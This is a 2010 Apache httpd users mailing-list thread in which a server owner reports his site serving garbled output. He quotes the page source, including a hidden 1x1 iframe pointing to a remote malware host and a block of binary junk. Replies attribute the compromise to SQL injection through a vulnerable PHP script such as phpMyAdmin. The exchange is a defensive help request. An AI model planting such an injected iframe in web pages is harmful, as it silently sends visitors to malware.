Oh, ok. I got it. I have already disabled it (actually, immediately after the attack). Thanks for the advice. I appreciate! Oleg.
On Sun, Apr 4, 2010 at 5:52 PM, Daniel Reinhardt <crypto...@cryptodan.net>wrote: > > -------------------------------------------------- > From: "Oleg Goryunov" <oleg.goryu...@gmail.com> > Sent: 04 April, 2010 13:39 > > To: <users@httpd.apache.org> > Subject: Re: [us...@httpd] Someone hacked my apache2 server > > > Yes, there is a MySQL server. And actually, I noticed that - while the >> server was returning the mentioned hacked page, mysql process was on top >> of >> the list of the "top" command. Though, it took only 1.5% of the CPU. >> But, mysql is restricted to accept connections from outside world. It only >> listens on local socket. >> What kind of vulnarability does mysql have? Do you know where I can read >> about it? >> Oleg. >> >> On Sun, Apr 4, 2010 at 4:55 PM, Daniel Reinhardt <crypto...@cryptodan.net >> >wrote: >> >> >>> -------------------------------------------------- >>> From: "Oleg Goryunov" <oleg.goryu...@gmail.com> >>> Sent: 03 April, 2010 21:03 >>> To: <users@httpd.apache.org> >>> Subject: [us...@httpd] Someone hacked my apache2 server >>> >>> Hello all, >>> >>>> It looks like someone hacked my apache2 server and I am trying to >>>> understand >>>> how this could have happened. >>>> This is what happened: >>>> All of a sudden the server - in response to a web-browser request for a >>>> page >>>> - started to give a full screen of unknown characters (looked like a >>>> long >>>> text with encoding mismatch). >>>> The output was immediate and the same for all the web-sites located on >>>> the >>>> server. >>>> Looking at the page source of the output I see the following: >>>> ========= >>>> >>>> <iframe src= http://azsxde55.9966.org:8800/ak47/29.html width=1 >>>> height=1></iframe> Л ������ э[сn█8 ■▌�√ \-░{ ╘Ц '█&q ┤I >>>> щ]╙ф╥l{√ла$┌fCС*I┘ёс цЮхЮьf(╩Ц 9N▓-о╗pА─ 9№f8Ь З╩Ё√Уєул▀.^СЙM >>>> ╣°їхЫ╫╟$шДсЗ┴q Ю\ЭР Ю^Э╜!¤nП\i* >>>> >>>> ╖\I*┬Ё╒█А k│¤0Ь═f▌┘алЇ8╝║ o лПГ¤╫ОнМь&6 ОЖО▀M*д9lAщяээ ГГгн√╙"╤╛аr| >>>> 0┘ G й= г╔╤ !├И F&ЪН РТ═║TP═НаСщ╞* >>>> MЮeJ█n ║Б)│ФрР √Ьєщa +iЩ┤ ;�...@№╙a`┘Н >>>> qр Й'T f s;ъ<псhЪ▓...@лhys ╦e┬nЮТС B═Z \│∙Lщд:фУRйаO╔▀▄g╦ ╦ни╩ўю╫ЛЛє╦л >>>> JЪ█Й╥ ╥ I╩%7░К █o >>>> >>>> HШЙ5╧p}+г >>>> I╛' b'М$sах1A}RAШ s╔ ХI9АдT╥1KёлЩ ╦╥ Nc&ЩЧт Я~w xЭgLТw*╫1#╟ ∙lБ\B:e y >>>> ├т ; Ч╫▐,B ! ╘2 .═" ╤) ╓]° ═��...@y6╬-┴ЎАа └ >>>> ж└1╝щ m ╙BIЮ└Щ╟':�...@МОБg╩ N├b■с' жJYеДщ~2р4aA№h┤Ш║EjАm │.&cчВЩ cАqЧ >>>> bSyь┬SPХ─=├д R├ пD▌ ЖЕ o >>>> >>>> #Х╠Б═╔ыў$ ╘@|H)ЧA╜)7LЯ1Щг9@/╙╨ d8R:%4F}А,L6Ь МnвТ├ S $.мO(0┌Аph╞╤ >>>> \Є╤l№ 4#·У'C.3┤ аMU"╞Є#КБ8╒9Х╚╦>ПхFGъ& T╪j┐с ·~ >>>> FZ∙d�0KJ.ю bE╔йь╜┼g ь8.╟нтг┴г╥ ┤щ9MxТ0YЄYЎ▐т4е" К93Ю╫ез%gмdЗ ii(░8 >>>> Н3%┴ГCTE кЖx─t╫o H щ█Ж!- Ф^ A┘#А╕ tI9kЗ▒UN║m~╩З;? Аv \╚ >>>> ╟8K═їbФ7а5C4│╣^▓z3x█ПO_Nc∙ПЬЮ^┌шd╧№ЎaW^|xЯп┼ВяI2`╜╜┴nowў┘(┌┘▐щя$╔^ э >>>> ╢√╔ВK бЖ!┌╣є8Ёз║WYХбS ┼Ё█я ▀pеqз ЄtьГPлЫє0ъО∙ha :"V сг╞i ╖Z@ >>>> Yў■ЕY,Р`- FE4Юa. ё Жv0и Ї ^ЎdTуц┬A╬>t╨╡┘ ЩМ╩г╙є│W }ё+▓ fUXЗўs -wвR >>>> F░∙Н╕5▐d ░Ч╛▒ >>>> >>>> >>>> ~ ёY вТ аY tlkачоЭ`√-▄ ┼mсЁ╠ .█ ╣н┌Г■{ х?ъ >>>> uю4d═┤JЄ╕.т╒щ+rqy~Єыё╒▌║▄m ╣Ь* 35ez╩a▒крпх{ь#eч:х>_┴Гъx 1°/л1xQщ╕ >>>> ╝вУжEФ,".`н╞г\║нмa E'YЇоЫ╚▐ >>>> .Zх А:эl.Л▐{│┘юн`уRЭ ─Ь °K╩t╠йш$hH │╖║ -д╚Ъ,i╔ТvЭ ¤╡"H пч¤Ў№° >>>> L╖W0Нsc┴ u R%ъ4╪Yf├5╬╟ЮТ,(+yє:ЎГ ь%│░щ]wR%1ё┬Е.r╞ ы╖ YR∙<} █ ю О╕д╥-q >>>> ╖_╩╬{2Yхц╕╔ ┴┤щрБA+Q╖▄▓Ч°▐{З╗чП >>>> >>>> wШA┼╣╓ю4Rўs╠Fз╠╣{╙ k╔йч░8╛▄ ■╢ЫБ├#ЕнБя№~ o╗╣ЫФа &28 >>>> ^...@o}у:╨f -AпеЪ ЦМ Ю┘k╚ пЎ▄{щ·╜/╖UїЫq$aйк╔xЄъь|═ 5 1▄ И Яєцц| ─w▄oя >>>> 4унc�╟?╞dLM#гx╖l┐┐J╖┐аJЫa >>>> ╙v*чї8x~vётэow+v╨\ П ╥dJ! │·╠_,Ъ╫Шъа ╚KрФ Г ь*ъY╤╢ >>>> r┼м1С4Н8<╗kaЁ█CЄїЧП═╫гGцы╤▌∙·"O Ч╤ │ї R_√YР.& | ПжtXОH°┤╤¤ЖНАD▄┘Й ю╕r >>>> ¤ >>>> >>>> KV$Ч ╙ШлWН'8z▒Р█ Жk╛YEx├хupDBRгИ4гIмє42p$╢У ЭГ ї¤f╦ > Ж ?> ы'ci >>>> в╫i�ЙйМaщ ~ЖV ТMЁ0╩╟╥┘ **єA╞ У░ #mgDS.ц√ vо 2бзX"Ь╥ГаN +бЇ>∙бч~ И;ўL >>>> Oь>Сp╚етА8<мГьУ■ ╗ Мяnё|<╨д_У█w?╧ь:Y ∙l-Л иSF╡Ш fa,VWэДZWА¤ЬГ.эЬ°]Х >>>> ▄щсМ├ >>>> >>>> би╝9сй+╬B A& ╔-ЧnдUX▒uu вF В )Odф >>>> с b6Щ ХkByКПV!╔Ф'╠!D░UСLA ─Х/%Аїч(d╠║Лx6щ;ЭЧкHй s╣OznЖ├HУЁш ╪┤L >>>> SАД( │БD.GF <http://d.gf/>Ц╟╫мм&╗Z3NvJ╣p шh╖w┬] ╦ >>>> >>>> С▌┴№┐ iяяАm 4─7шbеzq║hКФЕ┤╜N&└- >>>> >>>> *X;TуМСDэ{.╣X╟жКY╓р nbgl╦═E│$S У═Зр q K#К3Fб:╚·1 З ёqо]П█rА n:▀А╨ >>>> Ы╔Е;Лz╦0╕╩5С╤Д╤R╜ Ыr >>>> >>>> ┐Яyy4│ ┬>╚ЁН)╟{ЕЩ(х4╘╨ х ■ У |Їy8°y╖zЇ...@$d s№▒йb▒ж1Гпс│╦АPq_∙Ун8q ╒j >>>> ╒╢B║ ╡ь< ╪э*ЫГБe ЕkT|└э -Ў�┴Z ╝╫╠▄= 4═q├...@Ё╘ └Ю"ЛН┼LxЦA╪е╞н цмВY >>>> ёJф╢ЪЇ╓ ▒╥с╛°мщЄц╥╗>nG~CH(d"╒ГcЛР夹a ▓▐ 69╖ АoX;wц ыlэ╡s YИLШ@ >>>> ╗ √C Zь р"°ЄБPcЧa)gУeхд4NH┐ /═!cСДеР┤ й╔гФCъ .9+єЫ┐╪ ф5X р >>>> 6<ч▒┼�Ъ$╨т╥▒ИСЄ╥ №u╞aМtЄХ^ЁW?Kў╖2 ймУр╓4Р E >>>> >>>> ================== >>>> The address indicated in the begining of the page code leads to some >>>> chinese >>>> server. >>>> So, somehow it happened that the output of the apache server was >>>> substituted >>>> by this page, which redirected visitors to some chinese server. >>>> >>>> But the most strange thing was that the problem dissapeared itself! So, >>>> it >>>> last for 10 minutes then disappeared! And the again started and again >>>> dissapeared. Finally, I turned down apache untill I understand what is >>>> going >>>> on... >>>> >>>> Any idea how could that happen? How to reproduce this? How to prevent? >>>> Where to look for logs? I have check both ssh logs and apache logs, >>>> there >>>> is >>>> nothing that could seem unusual there... >>>> >>>> Any help is appreciated. >>>> Oleg. >>>> >>>> >>>> Oleg, >>> >>> Are you running any sort of MySQL Database on this machine, and if so is >>> it >>> patched and fully updated along with any php scripts. What you are >>> showing >>> us is indicative of a SQL Injection Attack. >>> >>> Shocked no one has mentioned especially with the rampant incline of the >>> Russian Business Network to spread its malware through the use of SQL >>> Injection on any vulnerable website. >>> >>> Thanks, >>> Daniel >>> >>> --------------------------------------------------------------------- >>> The official User-To-User support forum of the Apache HTTP Server >>> Project. >>> See <URL:http://httpd.apache.org/userslist.html> for more info. >>> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org >>> " from the digest: users-digest-unsubscr...@httpd.apache.org >>> For additional commands, e-mail: users-h...@httpd.apache.org >>> >>> >>> >> > Oleg, > > Its not a vulnerability with MySQL it is a vulnerable PHP Script such as an > outdated PHPMyAdmin or PHPMyAdmin itself. I hardly run it on my servers. I > would promptly disable it. > > > Thanks, > Daniel > > --------------------------------------------------------------------- > The official User-To-User support forum of the Apache HTTP Server Project. > See <URL:http://httpd.apache.org/userslist.html> for more info. > To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org > " from the digest: users-digest-unsubscr...@httpd.apache.org > For additional commands, e-mail: users-h...@httpd.apache.org > >